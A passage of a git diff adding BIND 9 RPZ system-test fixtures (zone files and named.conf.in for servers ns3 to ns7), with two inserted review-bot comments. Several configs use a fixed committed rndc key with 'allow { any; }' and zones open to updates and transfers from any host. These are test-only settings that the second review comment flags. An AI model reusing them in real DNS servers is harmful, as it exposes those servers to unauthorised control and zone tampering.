CNAME a4-6-cname2 + +a5-1-2 A 192.168.5.1 + A 192.168.5.2 + TXT "a5-1-2 tld2 text" + +a5-2 A 192.168.5.2 + TXT "a5-2 tld2 text" + +a5-3 A 192.168.5.3 + TXT "a5-3 tld2 text" + +a5-4 A 192.168.5.4 + TXT "a5-4 tld2 text" + +a6-1 A 192.168.6.1 + TXT "a6-1 tld2 text" +a6-2 A 192.168.6.2 + TXT "a6-2 tld2 text" + +a7-1 A 192.168.7.1 + TXT "a7-1 tld2 text" + +a7-2 A 192.168.7.2 + TXT "a7-2 tld2 text" diff --git a/bin/tests/system/rpz/ns3/base.db b/bin/tests/system/rpz/ns3/base.db new file mode 100644 index 0000000..f2f15a0 --- /dev/null +++ b/bin/tests/system/rpz/ns3/base.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ test +; This basic file is copied to several zone files before being used. +; Its contents are also changed with nsupdate + + +$TTL 300 +@ SOA blx. hostmaster.ns.blx. ( 1 3600 1200 604800 60 ) + NS ns.tld3. + +; regression testing for some old crashes +example.com NS example.org. + +domain.com cname foobar.com diff --git a/bin/tests/system/rpz/ns3/broken.db.in b/bin/tests/system/rpz/ns3/broken.db.in new file mode 100644 index 0000000..80aa313 --- /dev/null +++ b/bin/tests/system/rpz/ns3/broken.db.in 
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ test
+; This basic file is copied to several zone files before being used.
+; Its contents are also changed with nsupdate
+
+
+; broken zone
+foobar
diff --git a/bin/tests/system/rpz/ns3/crash1 b/bin/tests/system/rpz/ns3/crash1
new file mode 100644
index 0000000..0c85191
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/crash1
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+; a bad zone that caused a crash related to dns_rdataset_disassociate()
+
+$TTL 120
+@ SOA crash1.tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 )
+
+ NS tld2.
diff --git a/bin/tests/system/rpz/ns3/crash2 b/bin/tests/system/rpz/ns3/crash2
new file mode 100644
index 0000000..ab70283
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/crash2
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+; a valid zone containing records that caused crashes
+
+$TTL 120
+@ SOA crash2.tld3. hostmaster.ns.tld3. ( 1 3600 1200 604800 60 )
+ NS ns
+ns A 10.53.0.3
+
+; #24 in test1, crashed new ASSERT() in rbtdb.c
+c1 A 172.16.1.24
+
+; #16 in test2, crashed new ASSERT() in rbtdb.c
+c2 A 172.16.1.16
diff --git a/bin/tests/system/rpz/ns3/hints b/bin/tests/system/rpz/ns3/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns3/manual-update-rpz-2.db.in b/bin/tests/system/rpz/ns3/manual-update-rpz-2.db.in
new file mode 100644
index 0000000..f670b0c
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/manual-update-rpz-2.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ test
+; This basic file is copied to several zone files before being used.
+; Its contents are also changed with nsupdate
+
+
+$TTL 300
+@ SOA bl-reload. hostmaster.ns.bl-reload. ( 2 3600 1200 604800 60 )
+ NS ns.tld3.
+
+walled.tld2.bl-reload. 300 A 10.0.0.2
+
diff --git a/bin/tests/system/rpz/ns3/manual-update-rpz.db.in b/bin/tests/system/rpz/ns3/manual-update-rpz.db.in
new file mode 100644
index 0000000..a823448
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/manual-update-rpz.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ test
+; This basic file is copied to several zone files before being used.
+; Its contents are also changed with nsupdate
+
+
+$TTL 300
+@ SOA manual-update-rpz. hostmaster.ns.manual-rpz-update. ( 1 3600 1200 604800 60 )
+ NS ns.tld3.
+
+walled.tld2.manual-update-rpz. 300 A 10.0.0.1
diff --git a/bin/tests/system/rpz/ns3/mixed-case-rpz-1.db.in b/bin/tests/system/rpz/ns3/mixed-case-rpz-1.db.in
new file mode 100644
index 0000000..c8548fc
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/mixed-case-rpz-1.db.in
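Review bot: The header comment in ns3/manual-update-rpz.db.in (and the same text in ns3/manual-update-rpz-2.db.in and ns8/manual-update-rpz.db.in) is carried over from base.db and says the file is copied to several zone files and changed with nsupdate, but in this commit the `manual-update-rpz.` zone stanzas have no `allow-update` and setup.sh describes this as the one zone that is updated manually. I would replace it with something like `; RPZ test: copied into place by setup.sh and updated manually, not with nsupdate`. The SOA RNAME also reads `hostmaster.ns.manual-rpz-update.` while the zone is `manual-update-rpz`; this is presumably a transposition and harmless to the test, but `hostmaster.ns.manual-update-rpz.` would match the other fixtures' pattern.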
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ SOA mixed-case-rpz. hostmaster.ns.mixed-case-rpz. ( 1 3600 1200 604800 60 )
+ NS ns.tld3.
+
+A6-2.TLD2 CNAME .
diff --git a/bin/tests/system/rpz/ns3/mixed-case-rpz-2.db.in b/bin/tests/system/rpz/ns3/mixed-case-rpz-2.db.in
new file mode 100644
index 0000000..7d99c5a
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/mixed-case-rpz-2.db.in
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ SOA mixed-case-rpz. hostmaster.ns.mixed-case-rpz. ( 2 3600 1200 604800 60 )
+ NS ns.tld3.
+
+a6-1.tld2 CNAME .
+A6-2.TLD2 CNAME .
diff --git a/bin/tests/system/rpz/ns3/named.conf.in b/bin/tests/system/rpz/ns3/named.conf.in
new file mode 100644
index 0000000..dc069d8
--- /dev/null
+++ b/bin/tests/system/rpz/ns3/named.conf.in
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Main rpz test DNS server.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ statistics-file "named.stats";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ notify yes;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+ min-refresh-time 1;
+ min-retry-time 1;
+
+ response-policy {
+ zone "fast-expire";
+ zone "bl" max-policy-ttl 100;
+ zone "bl-2";
+ zone "bl-given" policy given recursive-only yes;
+ zone "bl-passthru" policy passthru;
+ zone "bl-no-op" policy no-op; # obsolete for passthru
+ zone "bl-disabled" policy disabled;
+ zone "bl-nodata" policy nodata recursive-only no;
+ zone "bl-nxdomain" policy nxdomain;
+ zone "bl-cname" policy cname txt-only.tld2.;
+ zone "bl-wildcname" policy cname *.tld4.;
+ zone "bl-garden" policy cname a12.tld2.;
+ zone "bl-drop" policy drop;
+ zone "bl-tcp-only" policy tcp-only;
+ zone "bl.tld2";
+ zone "manual-update-rpz";
+ zone "mixed-case-rpz";
+ }
+ add-soa yes
+ min-ns-dots 0
+ qname-wait-recurse yes
+ min-update-interval 0
+ nsdname-enable yes
+ nsip-enable yes
+ ;
+
+ include "../dnsrps.conf";
+ also-notify { 10.53.0.3 port @EXTRAPORT1@; };
+ notify-delay 0;
+};
+
+logging { category rpz { default_debug; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "."
{ type hint; file "hints"; };
+
+zone "bl." {type primary; file "bl.db";
+ allow-update {any;};};
+zone "bl-2." {type primary; file "bl-2.db";
+ allow-update {any;};};
+zone "bl-given." {type primary; file "bl-given.db";
+ allow-update {any;};};
+zone "bl-passthru." {type primary; file "bl-passthru.db";
+ allow-update {any;};};
+zone "bl-no-op." {type primary; file "bl-no-op.db";
+ allow-update {any;};};
+zone "bl-disabled." {type primary; file "bl-disabled.db";
+ allow-update {any;};};
+zone "bl-nodata." {type primary; file "bl-nodata.db";
+ allow-update {any;};};
+zone "bl-nxdomain." {type primary; file "bl-nxdomain.db";
+ allow-update {any;};};
+zone "bl-cname." {type primary; file "bl-cname.db";
+ allow-update {any;};};
+zone "bl-wildcname." {type primary; file "bl-wildcname.db";
+ allow-update {any;};};
+zone "bl-garden." {type primary; file "bl-garden.db";
+ allow-update {any;};};
+zone "bl-drop." {type primary; file "bl-drop.db";
+ allow-update {any;};};
+zone "bl-tcp-only." {type primary; file "bl-tcp-only.db";
+ allow-update {any;};};
+
+zone "bl.tld2." {type secondary; file "bl.tld2.db"; primaries {10.53.0.2;};
+ request-ixfr no; masterfile-format text;};
+
+zone "crash1.tld2" {type primary; file "crash1"; notify no;};
+zone "crash2.tld3." {type primary; file "crash2"; notify no;};
+
+zone "manual-update-rpz." {
+ type primary;
+ file "manual-update-rpz.db";
+ notify no;
+};
+
+zone "mixed-case-rpz." {
+ type primary;
+ file "mixed-case-rpz.db";
+ notify no;
+};
+
+zone "fast-expire." {
+ type secondary;
+ file "fast-expire.db";
+ primaries { 10.53.0.5; };
+ notify no;
+};
+
+zone "stub." {
+ type stub;
+ primaries { 10.53.0.2; };
+};
+
+zone "static-stub." {
+ type static-stub;
+ server-addresses { 10.53.0.2; };
+};
+
+zone "stub-nomatch." {
+ type stub;
+ primaries { 10.53.0.10; };
+};
+
+zone "static-stub-nomatch."
{
+ type static-stub;
+ server-addresses { 10.53.0.10; };
+};
+
+# A faulty dlz configuration to check if named with response policy zones
+# survives a certain class of failed configuration attempts (see GL #3880).
+# "dlz" is used because the dlz processing code is located in an ideal place in
+# the view configuration function for the test to cover the view reverting code.
+# The "BAD" comments below are necessary, because they will be removed using
+# 'sed' by tests.sh in order to activate the faulty configuration.
+#BAD dlz "bad-dlz" {
+#BAD database "dlopen bad-dlz.so example.org";
+#BAD };
diff --git a/bin/tests/system/rpz/ns4/hints b/bin/tests/system/rpz/ns4/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns4/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns4/named.conf.in b/bin/tests/system/rpz/ns4/named.conf.in
new file mode 100644
index 0000000..e2a9546
--- /dev/null
+++ b/bin/tests/system/rpz/ns4/named.conf.in
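Review bot: ns3/named.conf.in opens the rndc control channel with `allow { any; }` behind a fixed key (`secret "1234abcd8765"`) committed to the tree, and every `bl*` primary zone carries `allow-update {any;}` with no TSIG key, yet nothing in the file says this is deliberate test-only configuration. The same key and `controls` stanza recur in the ns4 to ns9 named.conf.in files of this commit, and ns5, ns6 and ns7 add `allow-transfer { any; }` (ns5 also `allow-update { any; }`). I would add a header comment such as `/* Test fixture only: fixed rndc key and open update/transfer ACLs; not for use outside the system-test addresses. */` to each of them so the stanzas are not copied as working examples. If the test clients always originate from the 10.53.0.x addresses used here (not visible in this hunk), narrowing the ACLs to that range would also limit exposure when the suite runs on a shared host.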
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ notify no;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "../trusted.conf";
+zone "." { type hint; file "hints"; };
+
+zone "tld4." {type primary; file "tld4.db";};
+zone "sub1.tld4." {type primary; file "tld4.db";};
+zone "subsub.sub1.tld4." {type primary; file "tld4.db";};
+zone "sub2.tld4." {type primary; file "tld4.db";};
+zone "subsub.sub2.tld4." {type primary; file "tld4.db";};
diff --git a/bin/tests/system/rpz/ns4/tld4.db b/bin/tests/system/rpz/ns4/tld4.db
new file mode 100644
index 0000000..fca419c
--- /dev/null
+++ b/bin/tests/system/rpz/ns4/tld4.db
@@ -0,0 +1,66 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ rewrite responses from this zone
+
+$TTL 120
+@ SOA tld4. hostmaster.ns.tld4. ( 1 3600 1200 604800 60 )
+ NS ns
+ns A 10.53.0.4
+
+
+txt-only TXT "txt-only-tld4"
+
+a14 A 14.14.14.14
+ AAAA 2001::14
+ TXT "a14 text"
+a14-cname CNAME a14
+
+a0-1 A 192.168.0.1
+ AAAA 2001:2::1
+ TXT "a0-1 text"
+
+a3-1 A 192.168.3.1
+ AAAA 2001:2:3::1
+ TXT "a3-1 text"
+
+a3-2 A 192.168.3.2
+ AAAA 2001:2:3::2
+ TXT "a3-2 text"
+
+a4-1 A 192.168.4.1
+ AAAA 2001:2:4::1
+ TXT "a4-1 text"
+a4-1-aaaa AAAA 2001:2:4::1
+
+a4-2 A 192.168.4.2
+ AAAA 2001:2:4::2
+ TXT "a4-2 text"
+a4-2-cname CNAME a4-2
+
+a4-3 A 192.168.4.3
+ AAAA 2001:2:4::3
+ TXT "a4-3 text"
+a4-3-cname CNAME a4-3
+
+a4-4 A 192.168.4.4
+ AAAA 2001:2:4::4
+ TXT "a4-4 text"
+
+a3-6.tld2 A 56.56.56.56
+
+a3-7.sub1.tld2 A 57.57.57.57
+
+a3-8.tld2 A 58.58.58.58
+
+a3-9.sub9.tld2 A 59.59.59.59
+
+a3-10.tld2 A 60.60.60.60
diff --git a/bin/tests/system/rpz/ns5/empty.db.in b/bin/tests/system/rpz/ns5/empty.db.in
new file mode 100644
index 0000000..a7e9144
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/empty.db.in
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 120
+@ SOA . hostmaster.ns.example.tld5. ( 1 3600 1200 604800 60 )
+ NS .
diff --git a/bin/tests/system/rpz/ns5/expire.conf.in b/bin/tests/system/rpz/ns5/expire.conf.in
new file mode 100644
index 0000000..4c1c228
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/expire.conf.in
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "fast-expire." {
+ type primary;
+ file "fast-expire.db";
+ allow-transfer { any; };
+ notify no;
+};
diff --git a/bin/tests/system/rpz/ns5/fast-expire.db.in b/bin/tests/system/rpz/ns5/fast-expire.db.in
new file mode 100644
index 0000000..cb2672e
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/fast-expire.db.in
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ SOA fast-expire. hostmaster (
+ 1 3 1 5 60
+ )
+ NS ns.tld3.
+
+expired.fast-expire. A 10.0.0.10
diff --git a/bin/tests/system/rpz/ns5/hints b/bin/tests/system/rpz/ns5/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns5/named.args b/bin/tests/system/rpz/ns5/named.args
new file mode 100644
index 0000000..56edbe3
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/named.args
@@ -0,0 +1,2 @@
+# run the performance test close to real life
+-c named.conf -D rpz-ns5 -X named.lock -gd3 -T maxcachesize=2097152
diff --git a/bin/tests/system/rpz/ns5/named.conf.in b/bin/tests/system/rpz/ns5/named.conf.in
new file mode 100644
index 0000000..b0fecdf
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/named.conf.in
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Test rpz performance.
+ */
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ statistics-file "named.stats";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ ixfr-from-differences yes;
+ notify-delay 0;
+ notify yes;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+
+ # turn rpz on or off
+ include "rpz-switch";
+
+ include "../dnsrps-slave.conf";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "../trusted.conf";
+zone "." {type hint; file "hints"; };
+
+zone "tld5." {type primary; file "tld5.db"; };
+zone "example.tld5." {type primary; file "example.db"; };
+
+zone "bl0." {type primary; file "bl.db"; };
+zone "bl1." {type primary; file "bl.db"; };
+zone "bl2." {type primary; file "bl.db"; };
+zone "bl3." {type primary; file "bl.db"; };
+zone "bl4." {type primary; file "bl.db"; };
+zone "bl5." {type primary; file "bl.db"; };
+zone "bl6." {type primary; file "bl.db"; };
+zone "bl7." {type primary; file "bl.db"; };
+zone "bl8." {type primary; file "bl.db"; };
+zone "bl9." {type primary; file "bl.db"; };
+zone "bl10." {type primary; file "bl.db"; };
+zone "bl11." {type primary; file "bl.db"; };
+zone "bl12." {type primary; file "bl.db"; };
+zone "bl13." {type primary; file "bl.db"; };
+zone "bl14."
{type primary; file "bl.db"; };
+zone "bl15." {type primary; file "bl.db"; };
+zone "bl16." {type primary; file "bl.db"; };
+zone "bl17." {type primary; file "bl.db"; };
+zone "bl18." {type primary; file "bl.db"; };
+zone "bl19." {type primary; file "bl.db"; };
+
+zone "policy1" {
+ type primary;
+ file "empty.db";
+ also-notify { 10.53.0.6; };
+ allow-update { any; };
+ allow-transfer { any; };
+};
+
+zone "policy2" {
+ type primary;
+ file "policy2.db";
+ allow-update { any; };
+ allow-transfer { any; };
+};
+
+include "expire.conf";
diff --git a/bin/tests/system/rpz/ns5/tld5.db b/bin/tests/system/rpz/ns5/tld5.db
new file mode 100644
index 0000000..b75e72f
--- /dev/null
+++ b/bin/tests/system/rpz/ns5/tld5.db
@@ -0,0 +1,32 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ performance test
+
+$TTL 120
+@ SOA . hostmaster.ns.example.tld5. ( 1 3600 1200 604800 60 )
+ NS ns
+ NS ns1
+ NS ns2
+ NS ns3
+ns A 10.53.0.5
+ns1 A 10.53.0.5
+ns2 A 10.53.0.5
+ns3 A 10.53.0.5
+
+
+$ORIGIN example.tld5.
+example.tld5. NS ns
+ NS ns1
+ns A 10.53.0.5
+ns1 A 10.53.0.5
+
+as-ns TXT "rewritten with ip-as-ns and qname-as-ns"
diff --git a/bin/tests/system/rpz/ns6/bl.tld2s.db.in b/bin/tests/system/rpz/ns6/bl.tld2s.db.in
new file mode 100644
index 0000000..4538050
--- /dev/null
+++ b/bin/tests/system/rpz/ns6/bl.tld2s.db.in
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA rpz.tld2. hostmaster.ns.tld2. ( 3 3600 1200 604800 60 )
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+32.2.7.168.192.rpz-ip A 1.1.1.1
+ AAAA ::1
diff --git a/bin/tests/system/rpz/ns6/hints b/bin/tests/system/rpz/ns6/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns6/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns6/named.conf.in b/bin/tests/system/rpz/ns6/named.conf.in
new file mode 100644
index 0000000..4c05207
--- /dev/null
+++ b/bin/tests/system/rpz/ns6/named.conf.in
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ statistics-file "named.stats";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ forward only;
+ forwarders { 10.53.0.3; };
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+ qname-minimization disabled;
+
+ response-policy {
+ zone "policy1" min-update-interval 0;
+ zone "bl.tld2s" policy given;
+ } qname-wait-recurse yes
+ // add-soa yes # leave add-soa as default for unset test
+ nsip-enable yes
+ nsdname-enable yes;
+
+ include "../dnsrps-slave.conf";
+};
+
+logging { category rpz { default_debug; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "../trusted.conf";
+
+zone "policy1" {
+ type secondary;
+ primaries { 10.53.0.5; };
+ file "empty.db";
+ also-notify { 10.53.0.3 port @EXTRAPORT1@; };
+ notify-delay 0;
+ allow-transfer { any; };
+};
+
+zone "bl.tld2s." {
+ type primary;
+ file "bl.tld2s.db";
+};
diff --git a/bin/tests/system/rpz/ns7/hints b/bin/tests/system/rpz/ns7/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns7/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns7/named.conf.in b/bin/tests/system/rpz/ns7/named.conf.in
new file mode 100644
index 0000000..24d9c62
--- /dev/null
+++ b/bin/tests/system/rpz/ns7/named.conf.in
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
